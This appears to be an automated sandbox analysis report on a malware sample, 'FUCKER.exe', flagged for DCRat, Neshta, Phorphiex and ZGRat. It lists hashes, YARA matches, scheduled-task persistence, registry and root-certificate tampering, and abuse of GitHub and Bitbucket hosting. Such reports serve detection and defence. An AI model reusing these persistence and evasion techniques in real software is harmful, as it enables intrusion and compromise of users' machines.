dcrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

10/03/2024, 15:09

240310-sjmk3sfc5s 10

Analysis

max time kernel
13s
max time network
608s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/03/2024, 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

dcrat neshta phorphiex zgrat google infostealer loader persistence phishing rat spyware trojan worm

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Neshta payload 40 IoCs

resource	yara_rule
behavioral1/files/0x0007000000015e02-922.dat	family_neshta
behavioral1/files/0x0007000000015e02-926.dat	family_neshta
behavioral1/files/0x0007000000015e02-928.dat	family_neshta
behavioral1/files/0x0007000000015e02-924.dat	family_neshta
behavioral1/files/0x0007000000015e02-929.dat	family_neshta
behavioral1/files/0x000500000001c83b-981.dat	family_neshta
behavioral1/files/0x0001000000010321-1015.dat	family_neshta
behavioral1/files/0x000100000001031f-1014.dat	family_neshta
behavioral1/files/0x0002000000010337-1013.dat	family_neshta
behavioral1/files/0x0003000000010342-1012.dat	family_neshta
behavioral1/memory/2816-1032-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/files/0x00010000000114d2-1074.dat	family_neshta
behavioral1/files/0x000100000000f83f-1063.dat	family_neshta
behavioral1/files/0x0001000000010394-1076.dat	family_neshta
behavioral1/files/0x0001000000010c1e-1082.dat	family_neshta
behavioral1/files/0x00010000000118f0-1109.dat	family_neshta
behavioral1/files/0x0001000000011883-1108.dat	family_neshta
behavioral1/files/0x0001000000010f3c-1107.dat	family_neshta
behavioral1/files/0x0001000000011809-1106.dat	family_neshta
behavioral1/files/0x0001000000010c1e-1104.dat	family_neshta
behavioral1/files/0x000200000001181c-1140.dat	family_neshta
behavioral1/files/0x000100000001187f-1162.dat	family_neshta
behavioral1/memory/1592-1295-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1948-1343-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2208-1348-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1388-1349-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2684-1361-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1700-1577-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1592-1703-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2032-1706-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1780-1711-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2032-1717-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2684-1719-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2684-1821-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1592-1809-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/3492-1939-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1592-1990-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1020-2002-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2684-2007-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/3492-2041-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/3832-1950-0x0000000004C00000-0x0000000004E08000-memory.dmp	family_zgrat_v1
behavioral1/memory/3832-1973-0x0000000004C00000-0x0000000004E03000-memory.dmp	family_zgrat_v1
behavioral1/memory/3832-1988-0x0000000004C00000-0x0000000004E03000-memory.dmp	family_zgrat_v1
behavioral1/memory/3832-2009-0x0000000004C00000-0x0000000004E03000-memory.dmp	family_zgrat_v1
behavioral1/memory/3832-2019-0x0000000004C00000-0x0000000004E03000-memory.dmp	family_zgrat_v1
behavioral1/memory/3832-2037-0x0000000004C00000-0x0000000004E03000-memory.dmp	family_zgrat_v1

Detected google phishing page
phishing google
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000400000001d9bf-5797.dat	family_phorphiex

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2200	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3448	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2812	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4012	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3368	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4076	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	240	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3720	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4104	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3484	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4232	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4192	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4040	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3364	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	648	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2044	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	648	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3416	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3264	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4920	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2300	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2452	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4820	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3344	2084	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	332	2084	schtasks.exe	109

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/4188-2926-0x0000000000C40000-0x0000000000DD0000-memory.dmp	dcrat
behavioral1/files/0x000700000001d340-3655.dat	dcrat
behavioral1/memory/3228-3987-0x0000000000250000-0x00000000003E0000-memory.dmp	dcrat
behavioral1/memory/4432-4507-0x0000000000D40000-0x0000000000F06000-memory.dmp	dcrat
behavioral1/files/0x000400000001d955-4622.dat	dcrat
behavioral1/files/0x000a00000001d953-5012.dat	dcrat

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2528	fu.exe

Loads dropped DLL 1 IoCs

pid	Process
2772	FUCKER.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
389	raw.githubusercontent.com
210	bitbucket.org
211	bitbucket.org
388	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0015000000015c87-64.dat	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5064	5100	WerFault.exe	237

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3364	schtasks.exe
1816	schtasks.exe
4520	schtasks.exe
3848	schtasks.exe
4192	schtasks.exe
4040	schtasks.exe
4940	schtasks.exe
1992	schtasks.exe
3620	schtasks.exe
4516	schtasks.exe
4740	schtasks.exe
1584	schtasks.exe
4336	schtasks.exe
4124	schtasks.exe
4120	schtasks.exe
3968	schtasks.exe
4104	schtasks.exe
2132	schtasks.exe
2300	schtasks.exe
4956	schtasks.exe
2044	schtasks.exe
648	schtasks.exe
3392	schtasks.exe
4736	schtasks.exe
4232	schtasks.exe
2452	schtasks.exe
4820	schtasks.exe
2508	schtasks.exe
4740	schtasks.exe
3760	schtasks.exe
3344	schtasks.exe
740	schtasks.exe
3484	schtasks.exe
4792	schtasks.exe
3416	schtasks.exe
1020	schtasks.exe
2812	schtasks.exe
1684	schtasks.exe
4432	schtasks.exe
4500	schtasks.exe
4544	schtasks.exe
4152	schtasks.exe
3816	schtasks.exe
3064	schtasks.exe
2200	schtasks.exe
4308	schtasks.exe
2576	schtasks.exe
240	schtasks.exe
4700	schtasks.exe
4808	schtasks.exe
3124	schtasks.exe
4380	schtasks.exe
3368	schtasks.exe
4732	schtasks.exe
4512	schtasks.exe
4452	schtasks.exe
3264	schtasks.exe
4732	schtasks.exe
528	schtasks.exe
804	schtasks.exe
4788	schtasks.exe
3448	schtasks.exe
4740	schtasks.exe
3952	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "6"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\accounts.google.com\ = "6"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D3CD3B1-DEF4-11EE-9667-569FD5A164C1} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "6"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D3A7251-DEF4-11EE-9667-569FD5A164C1} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	FUCKER.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	FUCKER.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	FUCKER.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
2528	fu.exe
2528	fu.exe
2528	fu.exe
1628	iexplore.exe
